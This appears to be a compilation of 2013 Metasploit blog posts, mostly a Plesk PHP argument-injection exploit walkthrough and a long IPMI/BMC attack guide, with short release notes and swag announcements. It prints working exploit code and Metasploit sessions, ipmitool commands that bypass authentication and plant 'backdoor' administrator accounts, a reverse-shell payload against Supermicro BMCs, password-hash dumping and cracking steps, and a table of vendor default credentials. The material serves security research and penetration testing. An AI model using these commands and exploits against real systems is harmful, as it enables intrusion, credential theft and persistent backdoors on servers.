While this T-shirt only works on the weak-minded, Rezeusor's design might get you out of a jam on your next pen-test engagement (just be sure to wear a button-down over it for appropriate camouflage).

not-the-hacker-swirl.png

 

Metasploit Shattered

And finally, the winning decal is from Lades. I like to think of it as representative of the Broken Windows Theory from criminology and sociology, but however you take it, it's pretty brilliant, and should work equally well on both light and dark laptop finishes, as well as over some other decal or logo. I'm certain to slap one of these on my car.

metasploit-shatter-decal.png

 

I Can Haz?

 

We'll have these all on hand at the Rapid7 BlackHat booth (Booth #517), so be sure to swing by and pick up one of your favorites. Since pretty much the entire Metasploit Framework and Metasploit Pro teams will be in town, feel free to stop by, score some swag, and let us know what you're doing to help promote open source security development.

According to Parallels, "Plesk is the most widely used hosting control panel solution, providing everything needed for creating and offering rich hosting plans and managing customers and resellers, including an intuitive User Interface for setting up and managing websites, email, databases, and DNS." (source: Parallels). On Jun 05 kingcope shocked Plesk world by announcing a new 0 day which could allow for remote command execution:

 

announce.png

 

According to the information included in the package it's a similar vulnerability to CVE-2012-1823, the PHP argument injection vulnerability discovered and exploited last year when using PHP on CGI mode:

 

this Plesk configuration setting makes it possible:

scriptAlias /phppath/ "/usr/bin/"

Furthermore this is not cve-2012-1823 because the php interpreter is called directly.

(no php file is called)

 

On Jun 06 Parallels created an article on its knowledge database where confirmed the exploit applying at least to  Plesk 9.0 - 9.2 on Linux/Unix platforms, and also referencing CVE-2012-1823:

 

parallels.png

The announced scriptAlias looks dangerous indeed. And after installing a fresh Plesk 9.0 on a CentOS distribution the dangerous script alias definition can be easily spotted. Start looking into the plesk configuration file /etc/psa/psa.conf, where the directory for the httpd configuration can be found:

 

HTTPD_CONF_D /etc/httpd/conf

 

There the /etc/httpd/conf/httpd.conf file lives, which also includes the configuration files from the /etc/httpd/conf.d directory:

# Load config files from the config directory "/etc/httpd/conf.d".

Include conf.d/*.conf

 

Finally, on /etc/httpd/conf.d/php_cgi.conf the dangerous scriptAlias definition can be found:

 

scriptAlias /phppath/ "/usr/bin/"

Action php-script /phppath/php-cgi

 

It is indeed a little different vulnerability than the previously mentioned CVE-2012-1823 vulnerability. This scriptAlias allows the power to remotely execute commands on the /usr/bin/ directory through the "/phppath" URI. Since the php interpreter lives on the /usr/bin/ directory, the same exploitation technique used on CVE-2012-1823 can be applied here to achieve remote PHP code execution. And, fortunately, there is already an exploit for CVE-2012-1823 in the Metasploit framework, written by @hdmoore, @egyp7 and @jjarmoc It's time to check if the current exploit can be applied here!

 

  • The first, and important difference is which the current exploit needs the user to specify a TARGETURI option. It is the URI for a CGI handled php script. It's not true anymore in the Plesk case, because the static URL /phppath/php will be used to execute the PHP interpreter through CGI.

 

  • Then, looking at the check function, the current metasploit module tries to inject the option -s (php interpreger) against the user specified PHP code:

 

response = send_request_raw({ 'uri' => uri + "?#{create_arg("-s")}"})
if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
  return Exploit::CheckCode::Vulnerable
end






 

The option -s on the php interpreter allows to "Display colour syntax highlighted source". In this way is possible to fingerprint the vulnerability, by checking if the PHP syntax highlight style has been applied. It's not true anymore in the Plesk case, because we're calling the PHP interpreter directly, and there isn't PHP source to apply any style, so a 500 HTTP error code will be generated, which can be used for Plesk vulnerability detection purposes.

 

  • Finally it's time to try exploitation with the current Metasploit module. First of all, will be checking the original kingcope exploit:

 

$ perl plesk-simple.pl 192.168.172.129

HTTP/1.1 200 OK

Date: Tue, 02 Jul 2013 08:10:30 GMT

Server: Apache/2.2.3 (CentOS)

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html

 

 

3

OK

 

 

67

Linux localhost.localdomain 2.6.18-348.el5 #1 SMP Tue Jan 8 17:57:28 EST 2013 i686 i686 i386 GNU/Linux

 

 

3e

uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)

 

 

0

 

The PHP code is, indeed, executed. Looking at the original 0day source:

 

$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id"); ?>';






 

Time to check how it looks in the server side, by monitoring the httpd process:

 

[pid  1358] execve("/usr/bin/php", ["/usr/bin/php", "-d", "allow_url_include=on", "-d", "safe_mode=off", "-d", "suhosin.simulation=on", "-d", "disable_functions=\\\"\\\"", "-d", "open_basedir=none", "-d", "auto_prepend_file=php://input", "-n"], [/* 21 vars */]) = 0

[pid  1359] execve("/bin/sh", ["sh", "-c", "uname -a;id"], [/* 21 vars */]) = 0

[pid  1360] execve("/bin/uname", ["uname", "-a"], [/* 24 vars */]) = 0

[pid  1359] --- SIGCHLD (Child exited) @ 0 (0) ---

[pid  1361] execve("/usr/bin/id", ["id"], [/* 24 vars */]) = 0

[pid  1359] --- SIGCHLD (Child exited) @ 0 (0) ---

[pid  1358] --- SIGCHLD (Child exited) @ 0 (0) ---

--- SIGCHLD (Child exited) @ 0 (0) ---

 

Understood, the httpd is going to exec the "/usr/bin/php" with a serie of php (user provided) options. Within these options the auto_prepend_file PHP option is set to php://input, in order to execute supplied PHP code. It is indeed the same technique used to exploit CVE-2012-1823, and applied in the current Metasploit module:

 

  • kingcope 0day:

 

$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
  uri_escape("allow_url_include=on","\0-\377"). "+" .
  uri_escape("-d","\0-\377"). "+" .
  uri_escape("safe_mode=off","\0-\377"). "+" .
  uri_escape("-d","\0-\377"). "+" .
  uri_escape("suhosin.simulation=on","\0-\377"). "+" .
  uri_escape("-d","\0-\377"). "+" .
  uri_escape("disable_functions=\"\"","\0-\377"). "+" .
  uri_escape("-d","\0-\377"). "+" .
  uri_escape("open_basedir=none","\0-\377"). "+" .
  uri_escape("-d","\0-\377"). "+" .
  uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
  uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
           ."Host: $ARGV[0]\r\n"
           ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
           ."Content-Type: application/x-www-form-urlencoded\r\n"
           ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;






 

  • Metasploit module:

 

args = [
  rand_spaces(),
  create_arg("-d","allow_url_include=#{rand_php_ini_true}"),
  create_arg("-d","safe_mode=#{rand_php_ini_false}"),
  create_arg("-d","suhosin.simulation=#{rand_php_ini_true}"),
  create_arg("-d",'disable_functions=""'),
  create_arg("-d","open_basedir=none"),
  create_arg("-d","auto_prepend_file=php://input"),
  create_arg("-n")
]

qs = args.join()
uri = normalize_uri(target_uri.path)
uri = "#{uri}?#{qs}"

# Has to be all on one line, so gsub out the comments and the newlines
payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
response = send_request_cgi( {
  'method' => "POST",
  'global' => true,
  'uri'    => uri,
  'data'   => payload_oneline,
}, 0.5)






 

Looks good! Testing:

 

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > set RHOST 192.168.172.129

RHOST => 192.168.172.129

msf exploit(php_cgi_arg_injection) > set TARGETURI /phppath/php

TARGETURI => /phppath/php

msf exploit(php_cgi_arg_injection) > exploit

 

 

[*] Started reverse handler on 192.168.172.1:4444

msf exploit(php_cgi_arg_injection) >

 

But no success on the first try. Time to check what happened on the server side:

 

[pid  1456] execve("/usr/bin/php", ["/usr/bin/php", "-d", "allow_url_include=On", "--define", "safe_mode=off", "--define", "suhosin.simulation=On", "--define", "disable_functions=\\\"\\\"", "--define", "open_basedir=none", "--define", "auto_prepend_file=php://input", "-n", "", ""], [/* 21 vars */]) = 0

--- SIGCHLD (Child exited) @ 0 (0) ---

 

Indeed the php interpreter is executed, and the same set of options, with some randomizations courtesy of the Metasploit developers. Looking deeply into these randomizations, some extra spaces on the end were spotted. This results in the PHP interpreter exiting prematurely, without executing our malicious PHP code. Ouch! (Note: These extra spaces were being ignored in more recent versions of the PHP interpreter, where the exploit was running successfully).

 

Okey, after tighten up a little, and introducing a new "PLESK" option to automate assessing, it's ready to you for testing! Indeed good exploits never die!

 

msf_session.png

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

IPMI, in my network?

This week's update features a set of tools for auditing your IPMI infrastructure. "Phew, I'm glad I'm not one of those suckers," you might be thinking to yourself. Well, the thing about IPMI (aka, the Intelligent Platform Management Interface) is that it's just a skootch more esoteric than most protocols, and even experienced server administrators may not be aware of it. Do you use server hardware from IBM, Dell, or HP? Have you ever had to use IBM's Remote Supervisor adapters, Dell's DRAC cards, or HP's iLO kit? If so, congrats! Chances are extremely good that you're running IPMI, and so you should really take a second to take a look at HD's and Dan Farmer's IPMI material.

 

In addition to the IPMI modules, we also have a bonus utility shipping this week, expertly snuck into the tools/ directory. Turns out, most (all?) offline password crackers don't do such a great job at cracking salted SHA1s in many cases. This was problematic for IPMI auditing, so HD whipped up out hmac_sha1_crack.rb. In fact, if you weren't aware of the tools/ directory, take a look. There's a lot in there that can help not only exploit development, but are useful for all sorts of specialized security tasks that you might not normally think of using Metasploit for.

 

Back to IPMI. Obviously, this vector is most relevant for the insider threat; sensible network management means that these IPMI devices won't be talking to your waiting room, your call center, or your parking lot over WiFi. If you've spent any time at all in the penetration testing world, though, you know it's really easy to screw those boundaries up, so it's worth it to audit your networks -- all of them -- for protocol endpoints that sneak through unexpectedly. And hey, there are some BOFHs out there that will go to great lengths to route traffic over VPN (or the Internet) so they can remote manage their machines from home or their phone. I've known a few of those guys. I might have even been one of those guys in a past life. (:

 

Redmine refresh

Also this week, we've done some housekeeping on our Redmine bug tracker. While none of the updates should be really noticeable by you, my beloved public bug filers and feature requestors, please do pipe up on the #metasploit Freenode IRC channel or mailing lists if you see something that doesn't seem right to you. Thanks to Kernelsmith for first noticing and reporting the problem with the Redmine wiki, and HD for untangling the somewhat labyrinthine dependencies that have grown around this server over time.

 

Oh, and incidentally, avoid using Redmine wiki; virtually everything of import has been moved to either the Metasploit Community (you're soaking in it!), or, for developer docs, GitHub.  We need to start putting in helpful redirects from the old wiki for the stragglers and identifying what's left to convert. If you'd like to help, feel free to volunteer, we can always use more motivated hands!

 

New modules

We've got six new modules this week, including the IPMI material. Go to town on your network before someone else does.

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weaponizing Local Exploits

This week's update features an exploit for Tavis @taviso Ormandy's vulnerability in the EPATHOBJ::pprFlattenRec function, which lives in win32k.sys on pretty much any Windows machine you're likely to run into. A whole lot of people threw in on this module to make this exploit reliable in Metasploit -- Tavis and progmboy wrote the original C exploit, new contributor @Keebie4e ported it to a Metasploit module, then a whole bunch of people threw in (and continue to do so) to make this exploit more and more stable. You can follow along at home by scrolling through PR #2036. I don't usually point at specific pull requests, but this one offers a pretty neat glimpse into how vulns become modules around here. If you're interested in exploit development, these are the kinds of discussions that are invaluable to follow along with.

 

Oh, and incidentally, there's no patch yet for this particular issue, so it's effectively 0-day. While it's "only" a privilege escalation, penetration testers pretty routinely need some way to elevate from a local user privilege level to local system (and from there, it's but a hop skip and jump away from Domain Administrator, thanks to the miracle of Mimikatz credential dumping.

 

Further, consider the power of an exploit like this when combine with, say, the latest Java Exploit from Adam Gowdiak and Matthias Kasier. What this means is that any malicious web server out on the Internet has a pretty straight shot at a whole lot of internal Windows networks.

 

That's pretty bad. Many, many domain administrators are now at the mercy of the next (secret, unpublished) client-side exploit. Hopefully, with the publication of this vulnerability, defenders (and Microsoft) will come up with a decent solution sooner rather than later. In the meantime, it seems like offensive security has the upper hand at the moment. Now might be a good time to check your defense in depth strategies...

 

New Modules

We've got five new modules this week, including the two referenced above. What can I say, the security community tends to get a little quiet in early July, as everyone finalizes their Bsides / BlackHat / DefCon material.

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Introduction

 

Dan Farmer is known for his groundbreaking work on security tools and processes. Over the last year, Dan has identified some serious security issues with the Intelligent Platform Management Interface (IPMI) protocol and the Baseboard Management Controllers (BMCs) that speak it. This post goes into detail on how to identify and test for each of the issues that Dan identified, using a handful of free security tools.  If you are looking for a quick overview of the issues discussed in this post, please review the FAQ. Dan has also put together an excellent best practices document that is a must-read for anyone working on the remediation side.

 

 

 

BMCs and the IPMI Protocol

 

Baseboard Management Controllers (BMCs) are a type of embedded computer used to provide out-of-band monitoring for desktops and servers. These products are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and Supermicro IPMI. BMCs are often implemented as embedded ARM systems, running Linux and connected directly to the southbridge of the host system's motherboard. Network access is obtained either via 'sideband' access to an existing network card or through a dedicated interface. In addition to being built-in to various motherboards, BMCs are also sold as pluggable modules and PCI cards. Nearly all servers and workstations ship with or support some form of BMC. The Intelligent Platform Management Interface (IPMI) is a collection of specifications that define communication protocols for talking both across a local bus as well as the network. This specification is managed by Intel and currently comes in two flavors, version 1.5 and version 2.0. The primary goal of Dan Farmer's research was on the security of the IPMI network protocol that uses UDP port 623. A diagram of the how the BMC interfaces with the system is shown below (CC-SA-3.0 (C) U. Vezzani).

 

IPMI-Block-Diagram.png

 

 

 

 

High Value Targets

 

BMCs are often under appreciated and overlooked during security audits. Like many embedded devices, they tend to respond slowly to tests and have a few non-standard network services in addition to web-based management. The difference between a BMC and say, a printer, is what you get access to once it has been successfully compromised. The BMC has direct access to the motherboard of its host system. This provides the ability to monitor, reboot, and reinstall the host server, with many systems providing interactive KVM access and support for virtual media. In essence, access to the BMC is effectively physical access to the host system. If an attacker can not only login to the BMC, but gain root access to it as well, they may be able to directly access the i2c bus and Super I/O chip of the host system. Bad news indeed.

 

 

 

Network Services

 

The network services offered by major brands of BMCs different widely by vendor, but here are some commonalities. Most BMCs expose some form of web-based management, a command-line interface such as Telnet or Secure Shell, and the IPMI network protocol on port 623 (UDP and sometimes TCP). The example below shows the output of Nmap -sSV -p1-65535 scan against a Supermicro BMC in its default configuration.

 

Supermicro IPMI (firmware SMT_X9_218)

 

PORT      STATE    SERVICE  VERSION

22/tcp    open    ssh      Dropbear sshd 2012.55 (protocol 2.0)

80/tcp    open    http      lighttpd

443/tcp  open    ssl/http  lighttpd

623/tcp  open    ipmi-rmcp SuperMicro IPMI RMCP

5900/tcp  open    vnc      VNC (protocol 3.8)

5985/tcp  open    wsman?

49152/tcp open    upnp      Intel UPnP reference SDK 1.3.1 (Linux 2.6.17.WB_WPCM450.1.3; UPnP 1.0)

 

In addition to the TCP ports listed, this device also responds on UDP ports 623 (IPMI) and 1900 (UPnP SSDP).

 

 

 

Network Discovery

 

A single-packet probe to the UDP IPMI service on port 623 is is an especially fast way of discovering BMCs on the network. The following examples demonstrates the use of the Metasploit Framework's ipmi_version module to identify local BMCs. The reply indicates whether the device supports version 1.5 or 2.0 and what forms of authentication are supported.

 

$ msfconsole

 

      =[ metasploit v4.7.0-dev [core:4.7 api:1.0]

+ -- --=[ 1119 exploits - 638 auxiliary - 179 post

+ -- --=[ 309 payloads - 30 encoders - 8 nops

 

msf> use  auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24

msf auxiliary(ipmi_version) > run

[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)

[*] 10.0.0.7:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user, non_null_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)

[*] 10.0.0.4:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user, non_null_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)

[*] 10.0.0.135:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)

[*] 10.0.0.249:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)

[*] 10.0.0.252:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)

 

 

 

 

Usernames & Passwords

 

As most penetration testers know, the easiest way into most network devices is through default passwords. BMCs are no different, and the table below shows the default username and password combinations for the most popular BMC brands sold today. Note that only HP randomizes the password during the manufacturing process.

 

Product NameDefault UsernameDefault Password
HP Integrated Lights Out (iLO)Administrator<factory randomized 8-character string>
Dell Remote Access Card (iDRAC, DRAC)rootcalvin
IBM Integrated Management Module (IMM)USERIDPASSW0RD (with a zero)
Fujitsu Integrated Remote Management Controlleradminadmin
Supermicro IPMI (2.0)ADMINADMIN
Oracle/Sun Integrated Lights Out Manager (ILOM)rootchangeme
ASUS iKVM BMCadminadmin

 

 

 

 

Vulnerability Exposure

 

This section documents the various vulnerabilities identified by Dan Farmer's research into IPMI and some additional findings that came to light during further investigation.

 

 

IPMI Authentication Bypass via Cipher 0

 

Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations. It is easy to identify systems that have cipher 0 enabled using the ipmi_cipher_zero module in the Metasploit Framework.

 

$ msfconsole

 

      =[ metasploit v4.7.0-dev [core:4.7 api:1.0]

+ -- --=[ 1119 exploits - 638 auxiliary - 179 post

+ -- --=[ 309 payloads - 30 encoders - 8 nops

 

msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero

msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.0/24

msf auxiliary(ipmi_cipher_zero) > run

[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)

[+] 10.0.0.99:623 VULNERABLE: Accepted a session open request for cipher zero

[+] 10.0.0.132:623 VULNERABLE: Accepted a session open request for cipher zero

[+] 10.0.0.141:623 VULNERABLE: Accepted a session open request for cipher zero

[+] 10.0.0.153:623 VULNERABLE: Accepted a session open request for cipher zero

 

 

The following example demonstrates how to exploit the cipher 0 issue using the standard "ipmitool" command-line interface. This utility is available on most platforms and be installed on Debian-based Linux distributions by running "sudo apt-get install ipmitool". Notice how the flag for specifying cipher 0 (-C 0) allows a previously disallowed action to execute. For this attack to work a valid username must be identified, which is almost never an issue. Once a backdoor account has been created, any number of attacks on the BMC and its host become possible.

 

$ ipmitool -I lanplus -H 10.0.0.99 -U Administrator -P FluffyWabbit user list

Error: Unable to establish IPMI v2 / RMCP+ session

Get User Access command failed (channel 14, user 1)

 

$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list

ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit

1  Administrator    true    false      true      ADMINISTRATOR

2  (Empty User)    true    false      false      NO ACCESS

 

$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 backdoor

$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 password

$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user priv 2 4

$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user enable 2

 

$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list

ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit

1  Administrator    true    false      true      ADMINISTRATOR

2  backdoor              true    false      true      ADMINISTRATOR

 

$ ssh backdoor@10.0.0.99

backdoor@10.0.0.99's password: password

 

User:backdoor logged-in to ILOMXQ3469216(10.0.0.99)

iLO 4 Advanced Evaluation 1.13 at  Nov 08 2012

Server Name: host is unnamed

Server Power: On

 

</>hpiLO->

 

 

 

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

 

More recently, Dan Farmer identified an even bigger issue with the IPMI 2.0 specification.  In short, the authentication process for IPMI 2.0 mandates that the server send a salted SHA1 or MD5 hash of the requested user's password to the client, prior to the client authenticating. You heard that right - the BMC will tell you the password hash for any valid user account you request. This password hash can broken using an offline bruteforce or dictionary attack. Since this issue is a key part of the IPMI specification, there is no easy path to fix the problem, short of isolating all BMCs into a separate network. The ipmi_dumphashes module in the Metasploit Framework can make short work of most BMCs.

 

$ msfconsole

 

      =[ metasploit v4.7.0-dev [core:4.7 api:1.0]

+ -- --=[ 1119 exploits - 638 auxiliary - 179 post

+ -- --=[ 309 payloads - 30 encoders - 8 nops

 

msf> use auxiliary/scanner/ipmi/ipmi_dumphashes

msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_dumphashes) > set THREADS 256

msf auxiliary(ipmi_dumphashes) > run

 

[+] 10.0.0.59 root:266ead5921000000....000000000000000000000000000000001404726f6f74:eaf2bd6a5 3ee18e3b2dfa36cc368ef3a4af18e8b

[+] 10.0.0.59 Hash for user 'root' matches password 'calvin'

[+] 10.0.0.59 :408ee18714000000d9cc....000000000000000000000000000000001400:93503c1b7af26abee 34904f54f26e64d580c050e

[+] 10.0.0.59 Hash for user '' matches password 'admin'

 

In the example above, the module was able to identify two valid user accounts (root and blank), retrieve the hmac-sha1 password hashes for these accounts, and automatically crack them using an internal wordlist. If a database is connected, Metasploit will automatically store the hashed and clear-text version of these credentials for future use. If a user's password is not found in the local dictionary of common passwords, an external password cracking program can be employed to quickly brute force possible options. The example below demonstrates how to write out John the Ripper and Hashcat compatible files.

 

msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.1.0/24
msf auxiliary(ipmi_dumphashes) > set THREADS 256

msf auxiliary(ipmi_dumphashes) > set OUTPUT_JOHN_FILE out.john

msf auxiliary(ipmi_dumphashes) > set OUTPUT_HASHCAT_FILE out.hashcat

msf auxiliary(ipmi_dumphashes) > run

 

[+] 10.0.1.100 root:ee33c2e02700000....000000000000000000000000000000001404726f6f74:8c576f6532 356cc342591204f41cc4eab7da6e8a




Thanks to atom, the main developer of Hashcat, version 0.46 or above now supports cracking RAKP hashes. It is worth noting that atom added support for RAKP within 2 hours of receiving the feature request! In the example below, we use hashcat with RAKP mode (7300) to brute force all four-character passwords within a few seconds.

 

./hashcat-cli64.bin --username -m 7300 out.hashcat -a 3 ?a?a?a?a

Initializing hashcat v0.46 by atom with 8 threads and 32mb segment-size...

 

Added hashes from file out.hashcat: 1 (1 salts)

[ ... ]

Input.Mode: Mask (?a?a?a)

Index.....: 0/1 (segment), 857375 (words), 0 (bytes)

Recovered.: 0/1 hashes, 0/1 salts

Speed/sec.: - plains, - words

Progress..: 857375/857375 (100.00%)

Running...: --:--:--:--

Estimated.: --:--:--:--

 

ee33c2e0270000....000000000000000000000000000000001404726f6f74:8c576f6532356cc34 2591204f41cc4eab7da6e8a:taco

 

All hashes have been recovered

 

 

Thanks to Dhiru Kholia, John the Ripper's "bleeding-jumbo" branch now supports cracking RAKP hashes as well. Make sure you have git installed and build John with the following steps.

 

$ git clone https://github.com/magnumripper/JohnTheRipper.git

$ cd JohnTheRipper

$ git checkout bleeding-jumbo

$ cd src

$ make linux-x86-64

$ cd ../run

$ ./john --fork=8 --incremental:alpha --format=rakp ./out.john


Loaded 1 password hash (RAKP [IPMI 2.0 RAKP (RMCP+) HMAC-SHA1 32/64 OpenSSL])

Press 'q' or Ctrl-C to abort, almost any other key for status

taco            (10.0.1.100 root)

 

 

 

IPMI Anonymous Authentication

 

In addition to the authentication problems above, Dan Farmer noted that many BMCs ship with "anonymous" access enabled by default. This is configured by setting the username of the first user account to a null string and setting a null password to match. The ipmi_dumphashes module will identify and dump the password hashes (including blank passwords) for null user accounts. This account can be difficult to use on its own, but we can leverage ipmitool to reset the password of a named user account and leverage that account for access to other services.

 

$ ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list

ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit

1                    false  false      true      ADMINISTRATOR

2  root            false  false      true      ADMINISTRATOR

3  admin            true    true      true      ADMINISTRATOR


$ ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 password


At this point we can login to the BMC over SSH using the new password for the root user account.


$ ssh root@10.0.0.97

root@10.0.0.97's password: password


>> SMASH-CLP Console v1.09 <<

->

 

 

 

 

Supermicro IPMI UPnP Vulnerability

 

Supermicro includes a UPnP SSDP listener running on UDP port 1900 on the IPMI firmware of many of its recent motherboards. On versions prior to SMT_X9_218 this service was running the Intel SDK for UPnP Devices, version 1.3.1. This version is vulnerable to the issues Rapid7 disclosed in February of 2013, and an exploit target for this platform is part of the Metasploit Framework. The interesting thing about this attack is that it yields complete root access to the BMC, something that is otherwise difficult to obtain. Keep in mind than an attacker with administrative access, either over the network or from a root shell on the host system, can downgrade the firmware of a Supermicro BMC to a vulnerable version and then exploit it. Once root access is obtained, it is possible to read cleartext credentials from the file system, install additional software, and integrate permanent backdoors into the BMC that would survive a full reinstall of the host's operating system.

 

$ msfconsole

 

      =[ metasploit v4.7.0-dev [core:4.7 api:1.0]

+ -- --=[ 1119 exploits - 638 auxiliary - 179 post

+ -- --=[ 309 payloads - 30 encoders - 8 nops

 

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

msf exploit(libupnp_ssdp_overflow) > set RHOST 10.0.0.98

msf exploit(libupnp_ssdp_overflow) > set LHOST 10.0.0.55

msf exploit(libupnp_ssdp_overflow) > set PAYLOAD cmd/unix/reverse_openssl

msf exploit(libupnp_ssdp_overflow) > exploit

 

[*] Started reverse double handler

[*] Exploiting 10.0.0.98 with target 'Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1' with 2106 bytes to port 1900...

[+] Sending payload of 182 bytes to 10.0.0.98:4259...

[*] Command shell session 1 opened (10.0.0.55:4444 -> 10.0.0.98:3688) at 2013-06-24 13:35:24 -0500

[*] Shutting down payload stager listener...

 

uname -a

Linux (none) 2.6.17.WB_WPCM450.1.3 #1 Wed Nov 14 10:33:10 PST 2012 armv5tejl unknown

 

 

 

Supermicro IPMI Clear-text Passwords

 

The IPMI 2.0 specification mandates that the BMC respond to HMAC-based authentication methods such as SHA1 and MD5. This authentication process has some serious weaknesses, as demonstrated in previous examples, but also requires access to the clear-text password in order to calculate the authentication hash. This means that the BMC must store a clear-text version of all configured user passwords somewhere in non-volatile storage. In the case of Supermicro, this location changes between firmware versions, but is either /nv/PSBlock or /nv/PSStore. The passwords are scattered between various binary blobs, but easy to pick out as they always follow the username. This is a serious issue for any organization that uses shared passwords between BMCs or even different types of devices.

 

$ cat /nv/PSBlock

  admin                      ADMINpassword^TT                    rootOtherPassword!



 

 

 

Exploiting the Host from the BMC

 

 

Once administrative access to the BMC is obtained, there are a number of methods available that can be used to gain access to the host operating system. The most direct path is to abuse the BMCs KVM functionality and reboot the host to a root shell (init=/bin/sh in GRUB) or specify a rescue disk as a virtual CD-ROM and boot to that. Once raw access to the host's disk is obtained, it is trivial to introduce a backdoor, copy data from the hard drive, or generally do anything needing doing as part of the security assessment. The big downside, of course, is that the host has to be rebooted to use this method. Gaining access to the host running is much trickier and depends on what the host is running. If the physical console of the host is left logged in, it becomes trivial to hijack this using the built-in KVM functionality. The same applies to serial consoles - if the serial port is connected to an authenticated session, the BMC may allow this port to be hijacked using the ipmitool interface for serial-over-LAN (sol). One path that still needs more research is abusing access to shared hardware, such as the i2c bus and the Super I/O chip.

 

ipmi_bios.pngipmi_boot.pngipmi_root.png

 

 

Exploiting the BMC from the Host

 

In situations where a host with a BMC has been compromised, the local interface to the BMC can be used to introduce a backdoor user account, and from there establish a permanent foothold on the server. This attack requires the ipmitool to be installed on the host and driver support to be enabled for the BMC. The example below demonstrates how the local interface on the host, which does not require authentication, can be used to inject a new user account into the BMC. This method is universal across Linux, Windows, BSD, and even DOS targets.

 

 

root@rcon:~# ipmitool user list

ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit

2  ADMIN            true    false      false      Unknown (0x00)

3  root            true    false      false      Unknown (0x00)

 

root@rcon:~# ipmitool user set name 4 backdoor

root@rcon:~# ipmitool user set password 4 backdoor

root@rcon:~# ipmitool user priv 4 4


root@rcon:~# ipmitool user list

ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit

2  ADMIN            true    false      false      Unknown (0x00)

3  root            true    false      false      Unknown (0x00)

4  backdoor        true    false      true      ADMINISTRATOR

 

 

 

Summary

 

The issues covered in this post were uncovered in a relatively short amount of time and have barely scratched the surface of possibilities. In addition to vulnerabilities in the IPMI protocol itself, most BMCs seem to suffer from issues common across all embedded devices, namely default passwords, outdated open source software, and, in some cases, backdoor accounts and static encryption keys. The world of BMCs is a mess that is not likely to get better anytime soon, and we need to be crystal clear about the risk these devices pose to our networks.

Chaining Zpanel Exploits for Remote Root

 

ZPanel is a fun, open source web hosting control panel, written in code auditors' favorite language, PHP. For bonus points, ZPanel likes to do some things as root, so it installs a nifty little setuid binary called 'zsudo' that does pretty much what you might expect from a utility of that name -- without authentication. In the wake of some harsh words on reddit and elsewhere in regard to the character of ZPanel's development team, the project came to the attention of some exploit developers with predictable results; now for the low, low price of using two exploits (one to get shell, and one to abuse the zsudo silliness) you can get remote root from a low-priv ZPanel user account.

 

